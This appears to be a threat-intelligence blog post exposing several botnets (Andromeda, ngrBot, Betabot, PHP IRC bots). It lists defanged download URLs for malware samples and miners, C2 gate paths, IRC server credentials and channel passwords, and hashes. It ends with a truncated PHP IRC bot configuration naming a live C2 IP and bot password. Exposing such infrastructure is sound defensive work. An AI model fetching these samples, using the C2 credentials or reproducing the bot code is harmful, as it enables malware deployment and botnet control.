Autoit Bot

Found this sample  and decompiled so have fun with the source wich is partially encrypted. Here the sample: hxxp://93.57.18.211/bot.exe And here the source decompiled and partially encrypted  with BitXOR password for the link is : exposedbotnets

voscomptesenligne.eu(Andromeda Bot hosted in Netherlands International Widespread Services Limited)

Sample found by ALiSs urls’s: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack  hxxp://www.curboc.com /joomla/r.pack hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902 Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/ Same Poem here : hxxp://www.curboc.com Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro) hosting infos: http://whois.domaintools.com/91.223.82.179

178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain :harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225

smokelessbooter.tk (Betabot http botnet hosted by ecatel.net)

Resolved smokelessbooter.tk to 94.102.51.123 Server:  smokelessbooter.tk Gate file:  /bronk/order.php Alternate domains: watchonlinecams.comssh-products.comfudfiles.comtheprofitnet.com1337hackers.comcash-networks.com We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well:

bigtoys.pw (Betabot http botnet hosted by namecheap.com)

Resolved bigtoys.pw to 198.187.28.72 Server:  bigtoys.pw Gate file:  /b/order.php Alternative domain: smalltoys.pw I wonder who this could belong to? Name Server:NS2.HOSTING-MARVID.ME Name Server:NS1.HOSTING-MARVID.ME An idiot, obviously Related md5s (search on malwr.com to download the samples): Betabot: 2662af32e5d58d471bd16dc3202db284 Hosting infos: http://whois.domaintools.com/198.187.28.72

37.221.170.195(PHP Bots hosted in Germany Frankfurt Am MainVoxility S.r.l.)

Found by Yewnix <? set_time_limit(0); error_reporting(0); class Anxiety { var $config = array(“server”=>”37.221.170.195”, // Server IP Address “port”=>443, “pass”=>””, // Server Password “prefix”=>”[r00t]-“, “maxrand”=>3, “chan”=>”#exploit”, // Channel “key”=>”lolmoney”, // Channel Key “modes”=>”+p”, “password”=>”lolmoney”, // Bot Password “trigger”=>”.”, “hostauth”=>”anxiety.gov” // * For Any Hostname //Leave all of this shit down here alone, unless you know what